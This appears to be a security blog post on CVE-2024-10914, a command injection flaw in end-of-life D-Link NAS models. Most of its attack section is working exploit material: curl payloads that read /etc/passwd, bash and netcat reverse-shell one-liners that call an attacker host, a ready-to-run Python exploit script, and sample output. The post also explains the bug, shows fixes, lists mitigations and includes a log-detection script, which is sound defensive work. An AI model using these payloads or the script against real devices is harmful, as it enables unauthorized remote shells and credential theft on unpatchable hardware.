Introduction

CVE-2024-10914 is a critical command injection vulnerability in several end-of-life D-Link NAS models. An unauthenticated attacker who can reach the device's web interface can execute arbitrary shell commands on it by sending a crafted request to the cgi_user_add command of the account_mgr.cgi script, whose name parameter is handed to the shell without validation or escaping.

This blog post provides:

  1. Manual exploitation steps to understand the attack.
  2. A Python script to automate exploitation.
  3. Logs, examples, and mitigation strategies.

Vulnerability Details

  • CVE: CVE-2024-10914
  • Severity: Critical (CVSS 9.2)
  • Type: Command Injection
  • Attack Vector: Unauthenticated HTTP GET requests to /cgi-bin/account_mgr.cgi with cmd=cgi_user_add.
  • Impacted Devices:
    • DNS-320 (Version 1.00)
    • DNS-320LW (Version 1.01.0914.2012)
    • DNS-325 (Versions 1.01 and 1.02)
    • DNS-340L (Version 1.08)

Root Cause: The cgi_user_add handler passes the name parameter into a shell command without validating or escaping it. A single quote in the value closes the quoted argument, and whatever follows a semicolon is executed as a separate shell command with the privileges of the CGI process.
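
The pattern behind the bug, as an added illustration in Python (not D-Link's code, which is a compiled CGI binary): a user-supplied name interpolated into a quoted shell string, next to the two fixes a developer would reach for. echo stands in for the real account-creation command, and the ';<command>;' payload has the same shape as the public proof of concept.

```python
import re
import shlex
import subprocess

# Constructed illustration of the CVE-2024-10914 bug class. "echo" stands in for
# the firmware's real account-creation command; none of this is D-Link's code.


def vulnerable_command(name):
    """The bug pattern: the user-supplied name is interpolated into a shell string.
    Single quotes are no protection, because a quote inside the value closes them."""
    return f"echo adding user '{name}'"


def escaped_command(name):
    """Minimal fix: shell-escape the value with shlex.quote before interpolation."""
    return f"echo adding user {shlex.quote(name)}"


# Allowlist for account names: lowercase letters, digits, '_' and '-', max 32 chars.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def validate_username(name):
    return bool(USERNAME_RE.match(name))


def safe_argv(name):
    """Preferred fix: validate against an allowlist, then pass the name as its own
    argv element so no shell ever parses it."""
    if not validate_username(name):
        raise ValueError(f"rejected username: {name!r}")
    return ["echo", "adding user", name]


def run_shell(command):
    """Run a command string through /bin/sh and return its stdout lines. stderr is
    ignored: the injected payload leaves a dangling '' token the shell complains about."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout.splitlines()


def run_argv(argv):
    """Run an argv list directly (no shell) and return its stdout lines."""
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout.splitlines()


if __name__ == "__main__":
    payload = "';echo INJECTED;'"  # same shape as the CVE proof of concept: ';<cmd>;'
    print("vulnerable:", run_shell(vulnerable_command(payload)))
    print("escaped:   ", run_shell(escaped_command(payload)))
    try:
        print("validated: ", run_argv(safe_argv(payload)))
    except ValueError as e:
        print("validated: ", e)
    print("validated: ", run_argv(safe_argv("alice")))
```

Running the block shows the vulnerable form printing INJECTED on its own line, the shlex.quote form printing the payload as a literal username, and the allowlist rejecting it outright. Escaping alone is the weaker fix: validating the value and passing it as a separate argv element means no shell ever parses attacker input.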


Manual Exploitation Method

Step 1: Identify the Target Device

Run an Nmap scan of a network you are authorized to test to find hosts with the web interface exposed (the scan below covers the default HTTP port; adjust it if the interface has been moved):

nmap -p 80 --open 192.168.1.0/24

Step 2: Craft a Malicious Payload

The vulnerable request is a plain GET to account_mgr.cgi. The single quotes and spaces in the payload must be URL-encoded (%27 and %20): curl sends the URL exactly as given, so an unencoded payload would be rejected or mangled in transit. Use curl to send the request:

curl "http://<Target-IP>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;uname%20-a;%27"

Step 3: Verify Response

If the device is vulnerable, it executes uname -a and the kernel and architecture string comes back in the HTTP response body.

Example Commands

List Directories:

curl "http://<Target-IP>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ls%20/;%27"

Extract Sensitive Files:

curl "http://<Target-IP>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;cat%20/etc/passwd;%27"

Drop Reverse Shell:
Start a listener on your machine:

nc -lvnp 4444

Send the payload. The reverse-shell one-liner contains & and > characters, so it cannot be pasted raw into the query string (an unencoded & would start a new parameter and truncate the command); let curl encode it with -G and --data-urlencode:

curl -G "http://<Target-IP>/cgi-bin/account_mgr.cgi" --data-urlencode "cmd=cgi_user_add" --data-urlencode "name=';bash -i >& /dev/tcp/<Attacker-IP>/4444 0>&1;'"

Note that these NAS models run a small BusyBox-style Linux userland, and bash (whose /dev/tcp redirection the one-liner relies on) may not be installed. If the listener receives nothing, try a netcat reverse shell instead, which works when the device's nc build supports -e:

curl -G "http://<Target-IP>/cgi-bin/account_mgr.cgi" --data-urlencode "cmd=cgi_user_add" --data-urlencode "name=';nc <Attacker-IP> 4444 -e /bin/sh;'"

Automated Exploitation with Python Script

This Python script simplifies the exploitation process by automating the HTTP request crafting and delivery.

Python Exploit Script

import sys

import requests


def exploit_dlink_nas(target_ip, command, timeout=10):
    """Send one injected command to the vulnerable cgi_user_add handler.

    The query string is built from a params dict so that requests URL-encodes it;
    quotes, spaces and shell metacharacters such as & and > then reach the device
    intact instead of being treated as URL syntax.
    """
    url = f"http://{target_ip}/cgi-bin/account_mgr.cgi"
    # A leading quote closes the quoted argument; the command runs after the ';'.
    params = {"cmd": "cgi_user_add", "name": f"';{command};'"}

    try:
        response = requests.get(url, params=params, timeout=timeout)
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

    print(f"[+] Sent: {response.url}")
    print(f"[+] Response Code: {response.status_code}")
    print("[+] Response Body:")
    print(response.text)
    return response.text


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python exploit_dlink.py <target_ip> <command>")
        sys.exit(1)

    exploit_dlink_nas(sys.argv[1], sys.argv[2])

Usage

  1. Save the script as exploit_dlink.py.
  2. Run the script, quoting the command so your shell passes it as a single argument: python exploit_dlink.py <Target-IP> "<Command>"

Examples

  • Retrieve System Information: python exploit_dlink.py 192.168.1.10 "uname -a"
    Output: Linux dlink-nas 3.10.23 #1 SMP Wed Dec 5 15:27:08 CST 2018 armv7l GNU/Linux
  • List Files: python exploit_dlink.py 192.168.1.10 "ls /"
  • Extract /etc/passwd: python exploit_dlink.py 192.168.1.10 "cat /etc/passwd"
  • Reverse Shell:
    Start a listener: nc -lvnp 4444
    Then send the payload: python exploit_dlink.py 192.168.1.10 "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1"

Logs and Analysis

Successful Command Injection (Manual):

curl "http://192.168.1.10/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ls%20/;%27"

Response:

bin
boot
etc
home
lib
usr
var

Successful Exploitation (Automated Script):

python exploit_dlink.py 192.168.1.10 "cat /etc/passwd"

Response:

root:x:0:0:root:/root:/bin/bash
nobody:x:99:99:Nobody:/:/sbin/nologin

Mitigation Strategies

  1. Retire Vulnerable Devices: D-Link has declared these models end-of-life and will not ship a fix, so replacing them with actively supported devices is the only real remediation.
  2. Restrict Network Access:
    • Never expose the NAS web interface to the internet; block inbound access at the perimeter and check for existing port forwards.
    • Use firewalls or VLANs so that only trusted management hosts can reach the device's HTTP port.
  3. Monitor Traffic: Review web-server, proxy or IDS logs for requests to /cgi-bin/account_mgr.cgi with cmd=cgi_user_add whose name parameter contains quotes, semicolons or other shell metacharacters (%27 and %3B in the raw URL). The exploit needs no session, so treat such requests from any address as hostile.
  4. Disable Unnecessary Features: If the device must stay in service, disable remote management and any unneeded services, and confine the web interface to a management network.
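
A log check for the third item above, as an added example that is not part of the original post. It scans combined-format web-server access log lines (constructed here: a benign user-add request, the uname -a probe, a reverse-shell payload as python-requests would encode it, and an unrelated page load), decodes the query string once the way the CGI's server does, and reports cgi_user_add requests whose name parameter contains shell metacharacters. The log format and field names are assumptions; adapt the regex to whatever your proxy or IDS exports.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format) for illustration; not real traffic.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Nov/2024:14:01:05 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=alice HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2024:14:03:22 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;uname%20-a;%27 HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.5 - - [10/Nov/2024:14:03:40 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bbash+-i+%3E%26+%2Fdev%2Ftcp%2F198.51.100.5%2F4444+0%3E%261%3B%27 HTTP/1.1" 200 0 "-" "python-requests/2.32.3"
192.168.1.50 - - [10/Nov/2024:14:05:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Source address, timestamp and request line of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"'
)

# Characters that let a value escape a single-quoted shell argument or chain commands.
SHELL_META = set(";|&`$'\"\\\n")


def parse_query(query):
    """Split a query string the way the CGI's server does: '&' separates pairs,
    the first '=' separates key from value, then percent-decode each once."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def inspect_request(uri):
    """Return the decoded name and the metacharacters found in it when the URI is a
    cgi_user_add request carrying shell metacharacters; otherwise None."""
    path, _, query = uri.partition("?")
    if not path.endswith("/cgi-bin/account_mgr.cgi"):
        return None
    params = parse_query(query)
    if params.get("cmd") != "cgi_user_add":
        return None
    name = params.get("name", "")
    meta = sorted(SHELL_META & set(name))
    if not meta:
        return None
    return {"name": name, "meta": meta}


def scan_log(text):
    """Run inspect_request over every parseable line; return one finding per hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = inspect_request(m["uri"])
        if hit:
            findings.append({"src": m["src"], "ts": m["ts"], **hit})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} cgi_user_add name={f['name']!r} meta={''.join(f['meta'])}")
```

The benign request with name=alice passes, while both attack lines are reported with the decoded payload, so an analyst sees the actual command rather than percent-escapes. Decoding exactly once matters: the server decodes once too, so a double-encoded %2527 would reach the CGI as a literal %27 and is not an injection on this path.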

Acknowledgments and References

Additional sources:

  1. NVD CVE-2024-10914 Details
  2. Cyble Blog on D-Link Vulnerabilities
  3. BleepingComputer Coverage

Disclaimer

This blog post is for educational purposes only. Unauthorized exploitation of vulnerabilities is illegal and unethical. Use this information responsibly and only with explicit authorization.

Stay informed, secure your devices, and help make the internet safer! 🌐